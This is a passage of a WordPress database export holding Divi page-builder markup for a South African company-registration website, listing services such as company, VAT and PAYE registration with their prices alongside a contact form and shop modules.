title=\"Cloud Applications\" subtitle=\"standard\" currency=\"R\" per=\"month\" sum=\"3000\" use_background_color_gradient=\"off\" background_color_gradient_start=\"#2b87da\" background_color_gradient_end=\"#29c4a9\" background_color_gradient_type=\"linear\" background_color_gradient_direction=\"180deg\" background_color_gradient_direction_radial=\"center\" background_color_gradient_start_position=\"0%\" background_color_gradient_end_position=\"100%\" parallax=\"off\" parallax_method=\"on\" background_size=\"cover\" background_position=\"center\" background_repeat=\"no-repeat\" background_blend=\"normal\" allow_player_pause=\"off\" featured=\"off\" header_font_select=\"default\" header_font=\"||||\" body_font_select=\"default\" body_font=\"||||\" subheader_font_select=\"default\" subheader_font=\"||||\" currency_frequency_font_select=\"default\" currency_frequency_font=\"||||\" price_font_select=\"default\" price_font=\"||||\" custom_button=\"off\" button_font_select=\"default\" button_font=\"||||\" button_use_icon=\"default\" button_icon_placement=\"right\" button_on_hover=\"on\"]\r\n\r\ncloud\r\n\r\ncloud\r\n\r\ncloud\r\n\r\ncloud\r\n\r\ncloud\r\n\r\ncloud\r\n\r\ncloud\r\n\r\ncloud\r\n\r\n&nbsp;\r\n\r\n[/et_pb_pricing_table][et_pb_pricing_table title=\"E-mail marketing \" subtitle=\"standard\" currency=\"R\" per=\"month\" sum=\"4000\" use_background_color_gradient=\"off\" background_color_gradient_start=\"#2b87da\" background_color_gradient_end=\"#29c4a9\" background_color_gradient_type=\"linear\" background_color_gradient_direction=\"180deg\" background_color_gradient_direction_radial=\"center\" background_color_gradient_start_position=\"0%\" background_color_gradient_end_position=\"100%\" parallax=\"off\" parallax_method=\"on\" background_size=\"cover\" background_position=\"center\" background_repeat=\"no-repeat\" background_blend=\"normal\" allow_player_pause=\"off\" featured=\"off\" header_font_select=\"default\" header_font=\"||||\" body_font_select=\"default\" body_font=\"||||\" subheader_font_select=\"default\" subheader_font=\"||||\" currency_frequency_font_select=\"default\" currency_frequency_font=\"||||\" price_font_select=\"default\" price_font=\"||||\" custom_button=\"off\" button_font_select=\"default\" button_font=\"||||\" button_use_icon=\"default\" button_icon_placement=\"right\" button_on_hover=\"on\"]\r\n\r\nE-mail marketing\r\n\r\nE-mail marketing\r\n\r\nE-mail marketing\r\n\r\nE-mail marketing\r\n\r\nE-mail marketing\r\n\r\nE-mail marketing\r\n\r\n&nbsp;\r\n\r\n[/et_pb_pricing_table] [/et_pb_pricing_tables][/et_pb_column][/et_pb_row][/et_pb_section]','Extended pricing table','','draft','closed','closed','','','','','2017-07-07 09:34:44','2017-07-07 07:34:44','',0,'https://companyregistration.online/?page_id=28513',0,'page','',0),(28523,3,'2017-07-07 11:34:49','2017-07-07 09:34:49','[et_pb_section bb_built=\"1\" _builder_version=\"3.0.58\" background_color_gradient_start=\"rgba(43,135,218,0.49)\" background_color_gradient_end=\"rgba(235,0,126,0.26)\" background_color_gradient_type=\"radial\" custom_padding=\"|0px||0px\"][et_pb_row _builder_version=\"3.0.58\" background_position_1=\"top_left\" background_repeat_1=\"no-repeat\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\"][et_pb_code _builder_version=\"3.0.58\"][Form id=\"14\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section]','Customize Your Package','','publish','closed','closed','','customize-your-package','','','2017-07-12 19:00:58','2017-07-12 17:00:58','',0,'https://companyregistration.online/?page_id=28523',0,'page','',0),(28554,3,'2017-07-10 14:19:59','2017-07-10 12:19:59','[et_pb_section bb_built=\"1\" fullwidth=\"off\" specialty=\"off\"][et_pb_row][et_pb_column type=\"4_4\"][et_pb_code _builder_version=\"3.0.58\"][Form id=\"16\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section bb_built=\"1\" custom_padding=\"0px|0px|0px|0px\" _builder_version=\"3.0.47\"][et_pb_row make_fullwidth=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" custom_padding=\"0px|0px|0px|0px\" custom_margin=\"|||\" background_color_1=\"rgba(52,188,32,0.11)\" background_color_2=\"rgba(12,113,195,0.24)\" padding_right_1=\"80px\" padding_left_1=\"80px\" padding_right_2=\"80px\" padding_left_2=\"80px\" background_position_1=\"top_left\" background_position_2=\"top_left\" background_repeat_1=\"no-repeat\" background_repeat_2=\"no-repeat\" _builder_version=\"3.0.58\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"1_2\"][et_pb_blurb title=\"Company Registration \" use_icon=\"on\" font_icon=\"%%144%%\" _builder_version=\"3.0.58\" /][et_pb_toggle title=\"Company Registration\" closed_toggle_background_color=\"#2bea27\" _builder_version=\"3.0.58\"]\r\n\r\n<a href=\"https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-cover.jpg\"><img class=\"alignnone wp-image-649\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-cover-300x300.jpg\" alt=\"\" width=\"170\" height=\"170\" />       </a>\r\n<p class=\"woocommerce-loop-product__title\">Private Company\r\n<span class=\"price\"><span class=\"woocommerce-Price-amount amount\">with 1 Director </span></span>\r\n<span class=\"price\"><span class=\"woocommerce-Price-amount amount\">   <a class=\"woocommerce-LoopProduct-link woocommerce-loop-product__link\" href=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-basic/\"><span class=\"woocommerce-Price-currencySymbol\">R</span> 750.00</a>                                          </span></span></p>\r\n[/et_pb_toggle][et_pb_toggle title=\"Private Company – 2 or More Shareholders Directly Involved\" closed_toggle_background_color=\"#2bea27\" _builder_version=\"3.0.58\" custom_padding=\"|||\"]\r\n\r\n<a href=\"https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-full-cover.png\"><img class=\"alignnone wp-image-174\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-full-cover-300x300.png\" alt=\"Company registration full\" width=\"170\" height=\"170\" />\r\n<span style=\"color: #000000;\">Private Company – 2 or More Shareholders Directly Involved In the Business</span>\r\n</a><a class=\"woocommerce-LoopProduct-link woocommerce-loop-product__link\" href=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-full/\"><span class=\"price\"><span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">R</span> 1,500.00</span></span></a>\r\n\r\n[/et_pb_toggle][et_pb_toggle title=\"Personal Liability Company\" closed_toggle_background_color=\"#2bea27\" _builder_version=\"3.0.58\"]\r\n\r\n<a href=\"https://companyregistration.online/wp-content/uploads/2016/03/Personal-Liability-Company.png\"><img class=\"alignnone wp-image-190\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/Personal-Liability-Company-300x300.png\" alt=\"Personal Liability Company\" width=\"170\" height=\"170\" />\r\n</a><a class=\"woocommerce-LoopProduct-link woocommerce-loop-product__link\" href=\"https://companyregistration.online/shop/company-registration/personal-liability-company/\"><span class=\"price\"><span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">R</span> 2,250.00</span></span></a>\r\n\r\n[/et_pb_toggle][et_pb_toggle title=\"Private Company With Customised MOI\" closed_toggle_background_color=\"#2bea27\" _builder_version=\"3.0.58\"]\r\n\r\n<a href=\"https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-customised-MOI.png\"><img class=\"alignnone wp-image-183\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-customised-MOI-300x300.png\" alt=\"Private Company registration customised MOI\" width=\"170\" height=\"170\" />\r\nR 4650.00</a>\r\n\r\n[/et_pb_toggle][et_pb_toggle title=\"BEE Affidavit \" closed_toggle_background_color=\"#e0a628\" _builder_version=\"3.0.58\"]\r\n\r\n<a href=\"https://companyregistration.online/wp-content/uploads/2016/03/BEE-Affidavit-cover-Final.png\"><img class=\"alignnone wp-image-198\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/BEE-Affidavit-cover-Final-300x300.png\" alt=\"BEE Affidavit\" width=\"170\" height=\"170\" />\r\n</a>\r\n<p class=\"product_title entry-title\">BEE Affidavit</p>\r\n<p class=\"price\"><span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">R</span> 199.00</span></p>\r\n&nbsp;\r\n\r\n[/et_pb_toggle][et_pb_toggle title=\"What I need to know before I start my business in SA \" closed_toggle_background_color=\"rgba(234,75,160,0.92)\" _builder_version=\"3.0.58\"]\r\n<p class=\"price\"><span class=\"woocommerce-Price-amount amount\"><a href=\"https://companyregistration.online/wp-content/uploads/2016/07/Free-Report-cover-e1467460316864.jpg\"><img class=\"alignnone wp-image-650\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/Free-Report-cover-212x300.jpg\" alt=\"Ebook: &quot;What I need to know before I start my business&quot;\" width=\"170\" height=\"241\" />\r\n</a></span></p>\r\n<p class=\"product_title entry-title\">What I need to know before I start my business in SA</p>\r\n<p class=\"price\"><span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">R</span> 199.00</span></p>\r\n&nbsp;\r\n\r\n[/et_pb_toggle][et_pb_divider height=\"20\" _builder_version=\"3.0.58\" /][/et_pb_column][et_pb_column type=\"1_2\"][et_pb_blurb title=\"Tax Registration\" use_icon=\"on\" font_icon=\"%%143%%\" _builder_version=\"3.0.58\" /][et_pb_toggle title=\"Urgent Vat Registration\" closed_toggle_background_color=\"#0c71c3\" closed_toggle_text_color=\"#ffffff\" icon_color=\"#ffffff\" _builder_version=\"3.0.58\"]\r\n\r\n<span class=\"price\"><span class=\"woocommerce-Price-amount amount\"> <a href=\"https://companyregistration.online/wp-content/uploads/2016/03/Vat-Registration-final-urgent.png\"><img class=\"alignnone wp-image-238\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/Vat-Registration-final-urgent-300x300.png\" alt=\"Vat Registration Urgent\" width=\"170\" height=\"170\" /></a>\r\n</span></span>\r\n<p class=\"product_title entry-title\">Urgent VAT Registration</p>\r\n<p class=\"price\"><span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">R</span> 5,000.00</span></p>\r\n<span class=\"price\"><span class=\"woocommerce-Price-amount amount\"> </span></span>\r\n\r\n&nbsp;\r\n\r\n[/et_pb_toggle][et_pb_toggle title=\"Salary Tax Registration (PAYE)\" closed_toggle_background_color=\"#0c71c3\" closed_toggle_text_color=\"#ffffff\" icon_color=\"#ffffff\" _builder_version=\"3.0.58\"]\r\n<p class=\"price\"><span class=\"woocommerce-Price-amount amount\"><a href=\"https://companyregistration.online/wp-content/uploads/2016/03/PAYE-registration-final.png\"><img class=\"alignnone wp-image-234\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/PAYE-registration-final-300x300.png\" alt=\"\" width=\"170\" height=\"170\" />\r\n</a></span></p>\r\n<p class=\"product_title entry-title\">Salary Tax Registration (PAYE)</p>\r\n<p class=\"price\"><span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">R</span> 1,500.00</span></p>\r\n<span class=\"price\"><span class=\"woocommerce-Price-amount amount\"> </span></span>\r\n\r\n&nbsp;\r\n\r\n[/et_pb_toggle][et_pb_toggle title=\"Tax Clearance Certificate \" closed_toggle_background_color=\"#0c71c3\" closed_toggle_text_color=\"#ffffff\" icon_color=\"#ffffff\" _builder_version=\"3.0.58\"]\r\n<p class=\"price\"><a href=\"https://companyregistration.online/wp-content/uploads/2016/03/Tax-Clearance-Certificate.gif\"><img class=\"alignnone wp-image-404\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/Tax-Clearance-Certificate-300x300.gif\" alt=\"\" width=\"170\" height=\"170\" />\r\n</a></p>\r\n<p class=\"product_title entry-title\">Tax Clearance Certificate</p>\r\n<p class=\"price\"><span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">R</span> 750.00</span></p>\r\n<span class=\"price\"><span class=\"woocommerce-Price-amount amount\"> </span></span>\r\n\r\n&nbsp;\r\n\r\n[/et_pb_toggle][et_pb_toggle title=\"Business Income Tax Registration \" closed_toggle_background_color=\"#0c71c3\" closed_toggle_text_color=\"#ffffff\" icon_color=\"#ffffff\" _builder_version=\"3.0.58\"]\r\n<p class=\"price\"><a href=\"https://companyregistration.online/wp-content/uploads/2016/03/Income-tax-registration-1.png\"><img class=\"alignnone wp-image-239\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/Income-tax-registration-1-300x300.png\" alt=\"Income tax registration\" width=\"170\" height=\"170\" />\r\n</a></p>\r\n<p class=\"product_title entry-title\">Business Income Tax Registration</p>\r\n<p class=\"price\"><span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">R</span> 450.00</span></p>\r\n<span class=\"price\"><span class=\"woocommerce-Price-amount amount\"> </span></span>\r\n\r\n&nbsp;\r\n\r\n[/et_pb_toggle][et_pb_toggle title=\"Import &amp; Export Code Registration\" closed_toggle_background_color=\"#0c71c3\" closed_toggle_text_color=\"#ffffff\" icon_color=\"#ffffff\" _builder_version=\"3.0.58\"]\r\n\r\n<a href=\"https://companyregistration.online/wp-content/uploads/2016/03/Importers-Exporters-Code-final.png\"><img class=\"alignnone wp-image-217\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/Importers-Exporters-Code-final-300x300.png\" alt=\"Importers Exporters Code\" width=\"170\" height=\"170\" />\r\n</a>\r\n<p class=\"product_title entry-title\">Import and Export Code Registration</p>\r\n<p class=\"price\"><span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">R</span> 2,250.00</span></p>\r\n&nbsp;\r\n\r\n[/et_pb_toggle][et_pb_toggle title=\"Vat Registration\" closed_toggle_background_color=\"#0c71c3\" closed_toggle_text_color=\"#ffffff\" icon_color=\"#ffffff\" _builder_version=\"3.0.58\"]\r\n\r\n<a href=\"https://companyregistration.online/wp-content/uploads/2016/03/Vat-Registration-final.png\"><img class=\"alignnone wp-image-235\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/Vat-Registration-final-300x300.png\" alt=\"Vat Registration\" width=\"171\" height=\"171\" />\r\n</a>\r\n<p class=\"product_title entry-title\">VAT Registration</p>\r\n<p class=\"price\"><span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">R</span> 3,500.00</span></p>\r\n&nbsp;\r\n\r\n[/et_pb_toggle][et_pb_divider height=\"20\" _builder_version=\"3.0.58\" /][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section bb_built=\"1\" custom_padding=\"0px|0px|54px|0px\" _builder_version=\"3.0.47\"][et_pb_row make_fullwidth=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" custom_padding=\"0px|0px|0px|0px\" background_color_1=\"rgba(104,216,0,0.25)\" background_color_2=\"rgba(235,0,126,0.21)\" padding_right_1=\"80px\" padding_left_1=\"80px\" padding_right_2=\"80px\" padding_left_2=\"80px\" background_position_1=\"top_left\" background_position_2=\"top_left\" background_repeat_1=\"no-repeat\" background_repeat_2=\"no-repeat\" _builder_version=\"3.0.58\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"1_2\"][et_pb_blurb title=\"Maintaining Your Company \" use_icon=\"on\" font_icon=\"%%176%%\" _builder_version=\"3.0.58\" /][et_pb_toggle title=\"Annual Returns\" closed_toggle_background_color=\"#7cda24\" closed_toggle_text_color=\"#ffffff\" icon_color=\"#ffffff\" _builder_version=\"3.0.58\"]\r\n<p class=\"price\"><span class=\"woocommerce-Price-amount amount\"><a href=\"https://companyregistration.online/wp-content/uploads/2016/04/Annual-Returns.jpg\"><img class=\"alignnone wp-image-27913\" src=\"https://companyregistration.online/wp-content/uploads/2016/04/Annual-Returns-300x300.jpg\" alt=\"Annual Returns\" width=\"170\" height=\"170\" />\r\n</a></span></p>\r\n<p class=\"product_title entry-title\">Annual Returns</p>\r\n<p class=\"price\"><span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">R</span> 450.00</span></p>\r\n&nbsp;\r\n\r\n[/et_pb_toggle][et_pb_toggle title=\"Change In Director/s\" closed_toggle_background_color=\"#7cda24\" closed_toggle_text_color=\"#ffffff\" icon_color=\"#ffffff\" _builder_version=\"3.0.58\"]\r\n<p class=\"price\"><span class=\"woocommerce-Price-amount amount\"><a href=\"https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Director-cover-final.png\"><img class=\"alignnone wp-image-200\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Director-cover-final-300x300.png\" alt=\"Change in Director\" width=\"170\" height=\"170\" />\r\n</a></span></p>\r\n<p class=\"product_title entry-title\">Change In Director/s</p>\r\n<p class=\"price\"><span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">R</span> 450.00</span></p>\r\n&nbsp;\r\n\r\n[/et_pb_toggle][et_pb_toggle title=\"Change in CC Member/s\" closed_toggle_background_color=\"#7cda24\" closed_toggle_text_color=\"#ffffff\" icon_color=\"#ffffff\" _builder_version=\"3.0.58\"]\r\n<p class=\"price\"><span class=\"woocommerce-Price-amount amount\"><a href=\"https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Member-cover.png\"><img class=\"alignnone wp-image-202\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Member-cover-300x300.png\" alt=\"Change in CC Member\" width=\"170\" height=\"170\" />\r\n</a></span></p>\r\n<p class=\"product_title entry-title\">Change in CC Member/s</p>\r\n<p class=\"price\"><span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">R</span> 450.00</span></p>\r\n&nbsp;\r\n\r\n[/et_pb_toggle][et_pb_toggle title=\"Change in CC Address\" closed_toggle_background_color=\"#7cda24\" closed_toggle_text_color=\"#ffffff\" icon_color=\"#ffffff\" _builder_version=\"3.0.58\"]\r\n<p class=\"price\"><span class=\"woocommerce-Price-amount amount\"><a href=\"https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Address-cover.png\"><img class=\"alignnone wp-image-206\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Address-cover-300x300.png\" alt=\"Change in Address\" width=\"170\" height=\"170\" /></a><a href=\"https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Member-cover.png\">\r\n</a></span>Change in CC Address</p>\r\n<p class=\"price\"><span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">R</span> 450.00</span></p>\r\n&nbsp;\r\n\r\n[/et_pb_toggle][et_pb_toggle title=\"Company and Close Corporations Restorations\" closed_toggle_background_color=\"#7cda24\" closed_toggle_text_color=\"#ffffff\" icon_color=\"#ffffff\" _builder_version=\"3.0.58\"]\r\n<p class=\"price\"><span class=\"woocommerce-Price-amount amount\"><a href=\"https://companyregistration.online/wp-content/uploads/2016/04/Restoration-of-Company-1.png\"><img class=\"alignnone wp-image-27911\" src=\"https://companyregistration.online/wp-content/uploads/2016/04/Restoration-of-Company-1-300x300.png\" alt=\"Restoration\" width=\"170\" height=\"170\" />\r\n</a></span></p>\r\n<p class=\"product_title entry-title\">Company and Close Corporations Restorations</p>\r\n<p class=\"price\"><span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">R</span> 3,500.00</span></p>\r\n&nbsp;\r\n\r\n[/et_pb_toggle][et_pb_divider height=\"20\" _builder_version=\"3.0.58\" /][/et_pb_column][et_pb_column type=\"1_2\"][et_pb_divider height=\"115\" _builder_version=\"3.0.58\" /][et_pb_contact_form email=\"info@companyregistration.online\" title=\"Did Not Find What You Are Looking For?? \" success_message=\"Thank You For Your Inquiry, We Will Be In Contact Shortly\" submit_button_text=\"Send Inquiry\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.0.58\"] [et_pb_contact_field field_id=\"Name\" field_title=\"Name\" _builder_version=\"3.0.47\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" _builder_version=\"3.0.47\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.0.47\"][/et_pb_contact_field] [/et_pb_contact_form][et_pb_divider height=\"20\" _builder_version=\"3.0.58\" /][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section bb_built=\"1\" _builder_version=\"3.0.58\"][et_pb_row _builder_version=\"3.0.58\"][et_pb_column type=\"1_2\"][et_pb_shop type=\"product_category\" include_categories=\"company-registration\" columns_number=\"3\" orderby=\"price\" _builder_version=\"3.0.58\" /][/et_pb_column][et_pb_column type=\"1_2\"][et_pb_shop include_categories=\"tax-registration\" columns_number=\"3\" orderby=\"price\" _builder_version=\"3.0.58\" /][/et_pb_column][/et_pb_row][/et_pb_section]','category','','publish','closed','closed','','category','','','2017-07-11 15:28:10','2017-07-11 13:28:10','',0,'https://companyregistration.online/?page_id=28554',0,'page','',0),(28613,3,'2017-07-11 11:15:48','2017-07-11 09:15:48','[et_pb_section fb_built=\"1\" _builder_version=\"3.0.47\" custom_padding=\"54px|0px|6px|0px\"][et_pb_row custom_padding=\"0px|0px|0px|0px\" _builder_version=\"3.0.58\"][et_pb_column type=\"4_4\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_tabs active_tab_background_color=\"#7cda24\" inactive_tab_background_color=\"#e8e8e8\" _builder_version=\"3.0.87\" tab_font=\"|on|||\" tab_text_color=\"#0c71c3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.16)\" background_color_gradient_direction=\"179deg\" background_color_gradient_start_position=\"37%\" border_radii=\"on|10px|10px|10px|10px\"][et_pb_tab title=\"Great Value\" _builder_version=\"3.0.58\" inline_fonts=\"Abel\"]<h4><span style=\"font-family: Abel; font-weight: normal;\"><strong>Registration for taxes will have to be done at some time in the future, why not do it now and save. Income tax registration occurs automatically when the company is registered.</strong></span></h4>\r[/et_pb_tab][et_pb_tab title=\"Secure Payment Gateway\" _builder_version=\"3.0.58\" inline_fonts=\"Abel\"]<h4><strong><span style=\"font-family: Abel;\">We use a trusted South African payment gateway. No credit card information is maintained on our site. Tbe payment gateway is a member of the Payments Association of South Africa (PASA)?</span></strong></h4>\r[/et_pb_tab][et_pb_tab title=\"For Tenders\" _builder_version=\"3.0.58\" inline_fonts=\"Abel\"]<h4><strong><span style=\"font-family: Abel;\">Get all the registrations documents <span style=\"color: #993366;\">for your tender</span> fast tracked and professionally done so that no opportunity is missed.</span></strong></h4>\r[/et_pb_tab][/et_pb_tabs][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.0.58\" custom_padding=\"0px|0px|0px|0px\"][et_pb_row make_fullwidth=\"on\" custom_width_px=\"760px\" custom_padding=\"27px|13px|27px|9px\" make_equal=\"on\" padding_top_1=\"15px\" padding_right_1=\"15px\" padding_bottom_1=\"15px\" padding_left_1=\"15px\" padding_top_2=\"15px\" padding_right_2=\"15px\" padding_bottom_2=\"15px\" padding_left_2=\"15px\" background_position_1=\"top_left\" background_position_2=\"top_left\" background_repeat_1=\"no-repeat\" background_repeat_2=\"no-repeat\" use_background_color_gradient_1=\"off\" use_background_color_gradient_2=\"off\" background_color_gradient_start_1=\"#ffffff\" background_color_gradient_start_2=\"#ffffff\" background_color_gradient_end_1=\"#2edb64\" background_color_gradient_end_2=\"#0c71c3\" background_color_gradient_type_1=\"radial\" background_color_gradient_type_2=\"radial\" background_color_gradient_start_position_1=\"71%\" background_color_gradient_start_position_2=\"78%\" custom_css_main_1=\"box-shadow: 0px 0px 30px #bfb7b6;\" custom_css_main_2=\"box-shadow: 0px 0px 30px #bfb7b6;\" _builder_version=\"3.0.58\"][et_pb_column type=\"1_2\" _builder_version=\"3.0.47\" padding_bottom=\"15px\" padding_left=\"15px\" padding_right=\"15px\" padding_top=\"15px\" parallax=\"off\" parallax_method=\"on\" background_position=\"top_left\" background_repeat=\"no-repeat\" use_background_color_gradient=\"off\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#2edb64\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"71%\" custom_css_main=\"box-shadow: 0px 0px 30px #bfb7b6;\"][et_pb_text _builder_version=\"3.0.87\" border_radii=\"on|10px|10px|10px|10px\" inline_fonts=\"Abel\"]<h3 style=\"text-align: center;\"><span style=\"font-size: x-large; color: #0c71c3;\"><strong><span style=\"font-family: Abel;\">Business Registrations</span></strong></span></h3>[/et_pb_text][et_pb_shop type=\"product_category\" include_categories=\"company-registration\" columns_number=\"3\" orderby=\"price\" _builder_version=\"3.0.87\" title_font=\"|700|||||||\" title_font_size=\"16px\" price_font=\"||on||||||\" price_font_size=\"16px\" price_text_color=\"#0c71c3\" border_radii=\"on|10px|10px|10px|10px\"][/et_pb_shop][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.0.47\" padding_bottom=\"15px\" padding_left=\"15px\" padding_right=\"15px\" padding_top=\"15px\" parallax=\"off\" parallax_method=\"on\" background_position=\"top_left\" background_repeat=\"no-repeat\" use_background_color_gradient=\"off\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#0c71c3\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"78%\" custom_css_main=\"box-shadow: 0px 0px 30px #bfb7b6;\"][et_pb_text _builder_version=\"3.0.58\" inline_fonts=\"Abel\"]<h3 style=\"text-align: center;\"><span style=\"font-family: Abel; font-size: x-large; color: #0c71c3;\"><strong>Tax Registrations</strong></span></h3>[/et_pb_text][et_pb_shop type=\"product_category\" include_categories=\"tax-registration\" columns_number=\"3\" orderby=\"price\" _builder_version=\"3.0.87\" title_font=\"|on|||\" price_font=\"|on|on||\" price_text_color=\"#0c71c3\"][/et_pb_shop][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.0.47\" custom_padding=\"0px|0px|0px|0px\"][et_pb_row make_fullwidth=\"on\" custom_width_px=\"760px\" custom_padding=\"8px|10px|17px|9px\" make_equal=\"on\" padding_top_1=\"15px\" padding_right_1=\"15px\" padding_bottom_1=\"15px\" padding_left_1=\"15px\" padding_top_2=\"15px\" padding_right_2=\"15px\" padding_bottom_2=\"15px\" padding_left_2=\"15px\" background_position_1=\"top_left\" background_position_2=\"top_left\" background_repeat_1=\"no-repeat\" background_repeat_2=\"no-repeat\" background_color_gradient_start_1=\"#ffffff\" background_color_gradient_start_2=\"#ffffff\" background_color_gradient_end_1=\"#7cda24\" background_color_gradient_end_2=\"#eb007e\" background_color_gradient_type_1=\"radial\" background_color_gradient_type_2=\"radial\" background_color_gradient_start_position_1=\"76%\" background_color_gradient_start_position_2=\"80%\" custom_css_main_1=\"box-shadow: 0px 0px 30px #bfb7b6;\" custom_css_main_2=\"box-shadow: 0px 0px 30px #bfb7b6;\" _builder_version=\"3.0.58\"][et_pb_column type=\"1_2\" _builder_version=\"3.0.47\" padding_bottom=\"15px\" padding_left=\"15px\" padding_right=\"15px\" padding_top=\"15px\" parallax=\"off\" parallax_method=\"on\" background_position=\"top_left\" background_repeat=\"no-repeat\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#7cda24\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"76%\" custom_css_main=\"box-shadow: 0px 0px 30px #bfb7b6;\"][et_pb_text _builder_version=\"3.0.87\" inline_fonts=\"Abel\"]<h3 style=\"text-align: center;\"><span style=\"font-family: Abel; font-size: x-large; color: #0c71c3;\"><strong>Maintaining Your Business</strong></span></h3>[/et_pb_text][et_pb_shop type=\"product_category\" include_categories=\"maintaning-our-company\" columns_number=\"3\" orderby=\"price\" _builder_version=\"3.0.87\" title_font=\"|on|||\" price_font=\"|on|on||\" price_text_color=\"#0c71c3\"][/et_pb_shop][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.0.47\" padding_bottom=\"15px\" padding_left=\"15px\" padding_right=\"15px\" padding_top=\"15px\" parallax=\"off\" parallax_method=\"on\" background_position=\"top_left\" background_repeat=\"no-repeat\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#eb007e\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"80%\" custom_css_main=\"box-shadow: 0px 0px 30px #bfb7b6;\"][et_pb_text _builder_version=\"3.0.87\" inline_fonts=\"Abel\"]<h3 style=\"text-align: center;\"><span style=\"font-size: x-large; color: #0c71c3;\"><strong><span style=\"font-family: Abel;\">Combo Deals<br /></span></strong></span></h3>[/et_pb_text][et_pb_shop type=\"product_category\" include_categories=\"combo-deals\" columns_number=\"3\" orderby=\"price\" sale_badge_color=\"rgba(244,34,171,0.84)\" _builder_version=\"3.0.87\" title_font=\"|on|||\" price_font=\"|on|on||\" price_text_color=\"#0c71c3\"][/et_pb_shop][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.0.47\" custom_padding=\"0px|0px|0px|0px\"][et_pb_row make_fullwidth=\"on\" custom_width_px=\"760px\" custom_padding=\"8px|10px|17px|9px\" make_equal=\"on\" padding_top_1=\"15px\" padding_right_1=\"15px\" padding_bottom_1=\"15px\" padding_left_1=\"15px\" padding_top_2=\"15px\" padding_right_2=\"15px\" padding_bottom_2=\"15px\" padding_left_2=\"15px\" background_position_1=\"top_left\" background_position_2=\"top_left\" background_repeat_1=\"no-repeat\" background_repeat_2=\"no-repeat\" background_color_gradient_start_1=\"#ffffff\" background_color_gradient_start_2=\"#ffffff\" background_color_gradient_end_1=\"#7cda24\" background_color_gradient_end_2=\"#eb007e\" background_color_gradient_type_1=\"radial\" background_color_gradient_type_2=\"radial\" background_color_gradient_start_position_1=\"76%\" background_color_gradient_start_position_2=\"80%\" custom_css_main_1=\"box-shadow: 0px 0px 30px #bfb7b6;\" 